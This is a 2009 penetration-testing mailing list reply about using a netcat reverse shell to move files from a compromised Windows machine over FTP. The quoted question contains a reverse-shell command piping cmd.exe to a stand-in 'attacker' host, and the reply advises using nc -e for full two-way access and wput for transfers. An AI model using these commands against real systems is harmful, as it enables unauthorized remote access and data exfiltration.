Penetration Testing mailing list archives
Re: Netcat reverse shell and ftp
From: David Howe <DaveHowe.Pentest () googlemail com>
Date: Sun, 25 Jan 2009 19:39:58 +0000
Avaya.Toons wrote:
Hello all, Can any one show me how an intruder could ftp back to his machine using a reverse nc session. The ftp server back in the attacker machine needs authentication. attacker>nc -L -P 23 victim>cmd | nc attacker 23
He wouldn't. The reverse NC session would be to link a cmd.exe shell on the compromised machine to a waiting "listen" session on the attacker's. The attacker would then launch and use the standard microsoft ftp command line client for the actual transfer, by typing commands into the cmd.exe shell now linked to his nc "session" on the machine connected to. you wouldn't pipe cmd.exe to the nc though, you would run it up with -e so you get full two-way comms. for that matter though - if you are able to get nc onto the target machine and run arbitrary commands, it would probably be easier to put wput or something on the machine and use that.
Current thread:
- Netcat reverse shell and ftp Avaya.Toons (Jan 25)
- Re: Netcat reverse shell and ftp Craig Wright (Jan 26)
- Re: Netcat reverse shell and ftp Giuseppe Fuggiano (Jan 26)
- Re: Netcat reverse shell and ftp Adriel T. Desautels (Jan 26)
- Re: Netcat reverse shell and ftp César García (Jan 26)
- Re: Netcat reverse shell and ftp David Howe (Jan 26)
- Re: Netcat reverse shell and ftp Avaya.Toons (Jan 27)
- RE: Netcat reverse shell and ftp Glafkos Charalambous (Jan 27)
- Re: Netcat reverse shell and ftp Avaya.Toons (Jan 28)
- Message not available
- Re: Netcat reverse shell and ftp David Howe (Jan 27)
- Re: Netcat reverse shell and ftp Avaya.Toons (Jan 27)
- Re: Netcat reverse shell and ftp René Østensen (Jan 28)
- RE: Netcat reverse shell and ftp Glafkos Charalambous (Jan 28)
- <Possible follow-ups>
- Re: Netcat reverse shell and ftp anastasiosm (Jan 26)